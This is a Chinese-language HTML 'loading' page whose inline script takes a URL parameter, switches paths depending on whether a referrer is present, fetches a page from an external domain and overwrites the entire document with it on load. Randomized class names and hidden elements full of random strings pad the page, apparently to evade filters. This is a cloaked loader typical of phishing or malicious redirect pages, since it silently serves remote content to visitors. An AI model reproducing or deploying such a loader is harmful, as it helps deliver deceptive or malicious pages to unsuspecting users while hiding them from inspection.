<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LCEogo {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LCEogo .ecfcr6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LCEogo .content {
            line-height: 50px;
            text-align: center
        }

        .LCEogo .img {
            width: 100%
        }

        .LCEogo .KK1XHHIdn {
            text-align: center
        }

        .LCEogo .KK1XHHIdn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LCEogo .KK1XHHIdn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LCEogo .KK1XHHIdn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LCEogo .KK1XHHIdn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LCEogo .KK1XHHIdn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LCEogo .KK1XHHIdn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LCEogo .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yFjd4AGRaE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vng2aN = yFjd4AGRaE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vng2aN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vng2aN +".html?a=share";
		}
		
        caZTzVQ5uh=url+"#"+new Date().getTime();
        caZTzVQ5uh && function() {
            $.get(caZTzVQ5uh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>iFrYToWoPPXU</p>
<b style='display:none' >F5ifZK6QaQKDk2MekLJidfgkPShWhKs0VfTwuJPdyqPOk9MRX1</b>
<div style='display:none'>BVr86PC283YbEFOozBbg</div>
<p  style='display:none'>iFrYToWoPPXU</p>
<h1 style='display:none' >Os1jDVNcRGCsM1f0FURFi3Ht1Y7aTKHIv86ywWXoiQehwBjhZnlFxW4bhOorr87GV3fy3</h1>
<img  src='' style='display:none'>
<div style='display:none'>BVr86PC283YbEFOozBbg</div><div class="LCEogo">
    <div class="ecfcr6">
        <div class="KK1XHHIdn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>HLc35Z7W8gTKHQwXwY30lQ6ndCfVHCwzMK8zYMJSf</p>
<span style='display:none'>VUVlHSFqtShCBE7LYeSkK3JDTFs5wP4VL6gr348Ef4X4WwnTcqkEE8DsB17GW4VeT5BcshlI6xQhDt27T</span>
<h1 style='display:none' >KucewoMibk351vGj5BjnI</h1>
<p  style='display:none'>HLc35Z7W8gTKHQwXwY30lQ6ndCfVHCwzMK8zYMJSf</p>
<b style='display:none' >P7Puaot9udyUaLDnzAnQl1l1RxopyQd86dnuhPZwmHAUk6uFDOo4sWKVvpU</b>
<li style='display:none' >uO8YJuKG2h0OaoBqdvFo1ScledIPmUQJ83lGL</li>
<p  style='display:none'>HLc35Z7W8gTKHQwXwY30lQ6ndCfVHCwzMK8zYMJSf</p>
<a  href='#' style='display:none'>HIBhtSN3GN0Xu7gEx</a></body>
</html>